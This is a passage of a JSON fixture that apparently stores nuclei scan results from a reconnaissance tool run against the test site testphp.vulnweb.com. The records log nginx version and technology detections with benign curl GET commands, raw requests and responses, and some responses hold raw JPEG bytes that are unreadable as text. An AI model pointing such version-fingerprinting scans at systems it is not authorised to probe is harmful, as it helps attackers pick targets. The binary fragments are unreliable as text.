\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 261, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:34:57.940Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 262, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:34:58.090Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 263, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.17 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:34:58.177Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.17 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 264, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 x64 AppleWebKit/537.36 KHTML like Gecko Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:34:58.266Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 Windows NT 10.0 Win64 x64 AppleWebKit/537.36 KHTML like Gecko Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 265, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:34:58.355Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:53 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW 